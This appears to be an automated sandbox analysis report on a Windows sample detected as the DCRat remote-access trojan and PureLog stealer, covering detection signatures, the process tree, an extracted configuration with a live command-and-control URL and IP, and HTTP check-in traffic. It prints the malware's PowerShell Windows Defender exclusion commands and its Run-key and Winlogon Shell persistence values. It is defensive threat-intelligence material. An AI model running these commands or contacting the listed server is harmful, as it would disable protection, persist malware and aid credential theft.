
Windows Analysis Report
4si9noTBNw.exe

Overview

General Information

Sample name: 4si9noTBNw.exe (renamed because original name is a hash value)
Original sample name: 68ef473852d3aefd8e5e4f2e00b3dfaa.exe
Analysis ID: 1571653
MD5: 68ef473852d3aefd8e5e4f2e00b3dfaa
SHA1: 3ba2594ec459d1c9152558ebdd9611427347a73e
SHA256: f28d2482802e94cd02376a7153b318ef4facc86cfc804ae117419c520520f8ec
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 4si9noTBNw.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\4si9noTBNw.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
    • csc.exe (PID: 7744 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7276 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7344 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7916 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7372 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7384 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5480 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7688 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 6600 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 8420 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • VTixufCejPQZEvXiB.exe (PID: 7768 cmdline: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • VTixufCejPQZEvXiB.exe (PID: 7808 cmdline: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • winlogon.exe (PID: 8112 cmdline: C:\Users\Public\AccountPictures\winlogon.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • winlogon.exe (PID: 8148 cmdline: C:\Users\Public\AccountPictures\winlogon.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • 4si9noTBNw.exe (PID: 8136 cmdline: C:\Users\user\Desktop\4si9noTBNw.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • 4si9noTBNw.exe (PID: 7352 cmdline: C:\Users\user\Desktop\4si9noTBNw.exe MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 7396 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 6676 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • VTixufCejPQZEvXiB.exe (PID: 8360 cmdline: "C:\Recovery\VTixufCejPQZEvXiB.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 8496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winlogon.exe (PID: 8616 cmdline: "C:\Users\Public\AccountPictures\winlogon.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • conhost.exe (PID: 8752 cmdline: "C:\Program Files\Windows Defender\en-GB\conhost.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • 4si9noTBNw.exe (PID: 8932 cmdline: "C:\Users\user\Desktop\4si9noTBNw.exe" MD5: 68EF473852D3AEFD8E5E4F2E00B3DFAA)
  • svchost.exe (PID: 9108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

{"C2 url": "http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads", "MUTEX": "DCR_MUTEX-6D1Q3I5bf77yvwQ4WtMP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Overview

Source | Rule | Description | Author | Strings
4si9noTBNw.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4si9noTBNw.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: 4si9noTBNw.exe PID: 7596 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: conhost.exe PID: 8420 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.4si9noTBNw.exe.f60000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.4si9noTBNw.exe.f60000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\winlogon.exe, NewProcessName: C:\Users\Public\AccountPictures\winlogon.exe, OriginalFileName: C:\Users\Public\AccountPictures\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\AccountPictures\winlogon.exe, ProcessId: 8112, ProcessName: winlogon.exe
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetFilename: C:\Program Files\Windows Defender\en-GB\conhost.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: "C:\Users\Public\AccountPictures\winlogon.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', ProcessId: 7276, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\winlogon.exe, NewProcessName: C:\Users\Public\AccountPictures\winlogon.exe, OriginalFileName: C:\Users\Public\AccountPictures\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\AccountPictures\winlogon.exe, ProcessId: 8112, ProcessName: winlogon.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VTixufCejPQZEvXiB
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", ProcessId: 7744, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', ProcessId: 7276, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\4si9noTBNw.exe, ProcessId: 7596, TargetFilename: C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe', ProcessId: 7276, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine: C:\Users\Public\AccountPictures\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\winlogon.exe, NewProcessName: C:\Users\Public\AccountPictures\winlogon.exe, OriginalFileName: C:\Users\Public\AccountPictures\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\AccountPictures\winlogon.exe, ProcessId: 8112, ProcessName: winlogon.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\4si9noTBNw.exe", ParentImage: C:\Users\user\Desktop\4si9noTBNw.exe, ParentProcessId: 7596, ParentProcessName: 4si9noTBNw.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline", ProcessId: 7744, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T16:00:32.875792+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | TCP

AV Detection

Source: 4si9noTBNw.exe; Avira: detected
Source: http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php; Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\JzShoUtR.log; Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Public\AccountPictures\winlogon.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads", "MUTEX": "DCR_MUTEX-6D1Q3I5bf77yvwQ4WtMP", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; ReversingLabs: Detection: 68%
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe; ReversingLabs: Detection: 68%
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe; ReversingLabs: Detection: 68%
Source: C:\Recovery\VTixufCejPQZEvXiB.exe; ReversingLabs: Detection: 68%
Source: C:\Users\Public\AccountPictures\winlogon.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\JzShoUtR.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\YdQxpHbm.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\exZDPEZZ.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\hMjNZkhU.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\nocldQFM.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xWYkXXxo.log; ReversingLabs: Detection: 25%
Source: 4si9noTBNw.exe; ReversingLabs: Detection: 68%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; Joe Sandbox ML: detected
Source: C:\Users\Public\AccountPictures\winlogon.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\OuwhFfWF.log; Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe; Joe Sandbox ML: detected
Source: 4si9noTBNw.exe; Joe Sandbox ML: detected
Source: 4si9noTBNw.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4si9noTBNw.exe; Directory created: C:\Program Files\Windows Defender\en-GB\conhost.exe
Source: C:\Users\user\Desktop\4si9noTBNw.exe; Directory created: C:\Program Files\Windows Defender\en-GB\088424020bedd6
Source: 4si9noTBNw.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.pdb source: 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\4si9noTBNw.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\4si9noTBNw.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\4si9noTBNw.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\4si9noTBNw.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\4si9noTBNw.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\4si9noTBNw.exe; File opened: C:\Users\user\AppData\Local

Networking

Source: Network traffic; Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 37.44.238.250:80
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View; IP Address: 37.44.238.250 37.44.238.250
Source: Joe Sandbox View; ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 384 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1748 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 161268 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1040 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1732 | Expect: 100-continue
Source: global traffic; HTTP traffic detected: POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 306039cm.nyashcrack.top | Content-Length: 1024 | Expect: 100-continue
